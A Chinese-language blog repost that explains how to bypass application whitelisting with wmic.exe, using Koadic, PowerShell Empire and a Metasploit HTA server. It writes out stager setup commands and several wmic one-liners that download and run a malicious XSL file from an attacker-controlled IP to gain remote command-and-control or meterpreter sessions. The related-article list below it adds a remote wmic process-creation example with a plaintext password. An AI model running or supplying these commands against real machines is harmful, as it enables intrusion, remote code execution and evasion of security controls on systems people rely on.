使用wmic.exe绕过应用程序白名单(多种方法)

最新推荐文章于 2023-12-11 15:58:51 发布
最新推荐文章于 2023-12-11 15:58:51 发布
阅读量1.2k 收藏 1
点赞数
原文链接:http://www.cnblogs.com/backlion/p/10489916.html
版权
 

一、Wmic.exe

wmic实用程序是一款Microsoft工具,它提供一个wmi命令行界面,用于本地和远程计算机的各种管理功能,以及wmic查询,例如系统设置、停止进程和本地或远程运行脚本。因此,它可以调用XSL脚本来执行。

二、攻击方法

1.第一种方法:Koadic

我们将在Koadic的帮助下生成一个恶意的XSL文件,它是一个命令和控制工具,与Metasploit和PowerShell empire非常相似。

要了解Koadic的工作原理,请阅读我们的文章:https://www.hackingarticles.in/koadic-com-command-control-framework/

安装完成后,您可以运行./koadic文件来启动koadic,并通过运行以下命令开始加载stager/js/wmic,并设置SRVHOST。

use stager/js/wmic
set SRVHOST 192.168.1.107
run

执行WMIC以下命令从远程服务器下载并运行恶意XSL文件:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

一旦恶意XSL文件在目标机器上执行,您就会像Metasploit一样拥有Zombie连接。

2.第二种方法:PowerShell Empire

对于我们的下一个wmic 攻击方法,我们将使用empire。empire是一款后开发框架。到目前为止,我们已经将XSL标记与metasploit匹配,但在这种方法中,我们将使用Empire框架。它只是基于python的PowerShell windows代理,这使得它非常有用。Empire由@ harmj0y,@ sixdub,@ enigma0x3,rvrsh3ll,@ killswitch_gui和@xorrior开发。您可以从https://github.com/empireproject/empire 下载此框架  。

要获得empire的基本指南,请访问我们的文章介绍,如下地址:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

启动Empire框架后,输入listener以检查是否有任何活动的侦听器。如下图所示,没有活动的侦听器。因此,需要设置一个监听器,请输入以下命令:

listeners
uselistner http
set Host http://192.168.1.107
execute

使用上述命令,您将拥有一个活动的侦听器。输入back以退出侦听器,以便您可以启动PowerShell。

对于wmic攻击,我们将使用stager。empire中的stager是一段代码段,它允许我们的恶意代码通过被感染主机上的代理运行。因此,对于这种类型,请输入以下命令:

usestager windows/launcher_xsl
set Listener http
execute

usestager将创建一个恶意代码文件,该文件将保存在名为launcher.xsl的/tmp中

我们使用python HTTP服务器在受害者的主机内传输此文件

一旦文件被执行,我们将在侦听器上获得结果。通过输入以下命令在受害者的主机中运行该文件:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

要查看是否有会话信息,请输入“agents”。这样将向您显示您拥有的会话的名称。要访问该会话请输入以下命令:

interact Z639YHPA
sysinfo

3.第三种方法:XSL代码中链接hta

我们知道,wmic可以远程执行任何文件或脚本,因此我们将在XSL代码中链接一个hta文件。XSL文件将包含一个链接,用于通过mshta.exe下载并执行恶意hta文件,该文件由wmic触发。

因此,让我们在Metasploit的帮助下生成一个hta文件:

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

现在复制URL并放在XSL代码中,因为它能够执行Microsoft语言脚本

然后,我们创建了一个“payload.xsl”文件,您可以从此链接获取帮助以编写XSL代码,然后放置hta文件的链接,如下所示。

现在我们需要借助以下命令通过wmic.exe来执行XSL文件:

wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"

执行上述命令后,您将获得一个meterprter会话。要访问会话,请输入以下命令:

sessions 1

 

 
 
 
 

转载于:https://www.cnblogs.com/backlion/p/10489916.html

weixin_30764137
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
修复windows下不能使用wmic命令.bat
10-14
WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具) ,提供了从命令行接口和批命令脚本执行系统管理的支持。非常好用命令,这个脚本用于修复wmic不能使用的问题
WMIC使用
good good study
11-15 5599
远程创建进程 如下,以administrator用户连接192.168.52.140,并在机器上创建一个进程执行ipconfig命令,将结果写入c:\result.txt文本文件中:(由于wmic执行远程命令没有回显,所以要将结果写入到txt中) wmic /node:192.168.52.140 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig > c:\result.txt...
Windows安全基础——Windows WMI详解
Liu_Bruce的博客
12-11 3929
WMI(Windows Management Instrumentation, Windows管理规范)是Windows 2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,Distribution Components Object Model)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。对于其他的Win32
WMIC 全新的超级命令行管理工具
张彤的专栏
08-05 862
  微软Windows Server的图形界面接口在为网络管理提供便利的同时,因其消耗资源偏大、操作缓慢而颇受Windows管理员的微词,为提供一个图形管理界面之外的另一种选择,微软推出了集WMI的强大与命令行的简洁于一身的全新的命令行管理工具WMIC。加入了WMIC的Windows server 2003的命令行,据称可以完成几乎所有的管理任务。  以DOS起家的微软,最终靠图形界面一统了天
windows比cmd更强大的 WMIC命令使用详解
whl0071的专栏
10-14 5467
windows比cmd更强大的 WMIC命令使用详解
wmic命令用法小例
weixin_30673715的博客
06-26 144
wmic就是wmic.exe,位于windows目录底下,是一个命令行程序。WMIC可以以两种模式执行:交互模式(Interactive mode)和非交互模式(Non-Interactive mode),经常使用Netsh命令行的读者应该非常熟悉这两种模式。 交互模式。如果你在命令提示符下或通过"运行"菜单只输入WMIC,都将进入WMIC的交互模式,每当一个命令执行完毕后,系统还会返回到WMI...
WMIC.exe
12-28
WMIC
53.远控免杀专题(53)-白名单WMIC.exe执行payload1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
WMIC.EXE-5077AF5A.pf
01-12
WMIC.EXE-5077AF5A
wmic.c C语言实现WMI
09-16
wmic.c C语言实现WMI
Windows远程cmd工具WMIcmd.exe
07-15
WMIcmd可以连接远程windows服务器,执行cmd命令。(要求远程端必须开启RPC服务,而且NET Framework必须为4.0以上)
Windows WMIC命令使用详解
《好好先生》专栏
08-26 3603
Windows WMIC命令使用详解 第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC的命令行提示符。在WMIC命令行提示符上,命令以交互的方式执行。 执行“wmic”命令启动WMIC命令行环境。这个命令可以在XP或.NET Server的标准命令行解释器(cmd.exe)、Telnet会话或“运行”对话框中执行。这些启动方法可以在本地使用,也可以通过.NET S...
Win11无法识别Wmic怎么办?Win11识别不了Wmic的解决方法
qq_29508575的博客
04-07 4847
Win11无法识别Wmic怎么办?Wmic是一款命令行管理工具。使用Wmic,我们不但可以管理本地计算机,而且还可以管理同一windows域内的所有远程计算机(需要必要的权限),而被管理的远程计算机不必事先安装Wmic,只需要支持Wmi即可。 更多系统教程尽在小白系统重装官网   从Win11 build 22572开始,WMIC仅作为可卸载或重新安装的可选功能提供。   此过程非常简单,只需在Win11设备的“设置”菜单中进行一些调整。   在我们开始之前,请记住,您必须以管理员身份登录才能添
应急响应---windows入侵排查
xianjie0318的博客
07-09 914
1、windows入侵排查 windows常见的攻击 web入侵:木马 网页挂马 主页篡改 webshell 系统入侵:病毒木马 勒索软件 远控后门 网络攻击:DDOS攻击 DNS劫持 ARP欺骗 入侵排查思路 1、首先:检查系统账号安全 1)查看服务器是否存在弱口令账户 2)检查远程管理端口是否对公网开放 3)检查账户策略是否符合基准要求 检查方法:输入secpol.msc,进入安全设置-账户策略 密码策略、账户锁定策略 4)查看服务器是否存在可疑账户、新增账户、账户变更 方法:打开"运行"或cmd
WMI攻击检测
Ping_Pig的博客
11-09 1076
讲在前面:     无论何种攻击手法在日志或流量是都会留下一定的痕迹,但是使用何种的规则将其监控到,这是令防守方头大的问题。WMI横向移动、权限维持都会在日志监控到。至于如何制定规则,本文不展开。 总之两点: 做好 WMI 连接的网络流量监控,一般不使用 WMI 的环境若出现了使用 WMI的情况,则内部网络可能已经被入侵。 做好进程监控,监测”wmic.exe“的命令行参数及其执行的命令。 日志检测 注意:在日志检测中,最重要的数据来源就是Windows日志,而
横向移动-传递攻击WMI服务利用cscript&vmiexec&wmic
m0_65096687的博客
05-28 208
wim是通过135端口进行利用的,支持明文和hash的方式进行认证,并且不会在目标系统日志下留下痕迹。
使用rundll32.exe绕过应用程序白名单(多种方法
weixin_30622107的博客
03-07 258
0x00 前言 本文演示了白名单AppLocker bypass的最常见和最熟悉的技术。我们知道,出于安全原因,系统管理员添加组策略来限制本地用户的应用程序执行。在上一篇文章中,我们讨论了“Windows Applocker策略 - 初学者指南”,因为它们为应用程序控制策略定义了AppLocker规则,以及如何使用它们。但今天您将学习如何使用rundll文件绕过AppLocker策略。 DL...
比CMD更强大的命令行:WMIC后渗透利用(系统命令)
热门推荐
discover2210212455的博客
09-15 5万+
写在前面的话 在这篇文章中,我们将讨论如何在攻击的后渗透利用阶段使用WMIC(Windows Management InstrumentationCommand Line)。当攻击者在远程PC上拿到meterpreter会话之后,他们就可以枚举大量的系统信息,并利用WMI命令行工具来进行更深程度的操作。 首先,我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后,我们还会告诉大...
开机显示C:\Windows\System32\wbem\WMIC.exe
最新发布
02-10
C:\Windows\System32\wbem\WMIC.exe 是一个 Windows 系统中的命令行工具,它是 Windows Management Instrumentation Command-line (WMIC) 的可执行文件。WMIC 是一种强大的管理工具,它允许用户通过命令行界面来访问...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值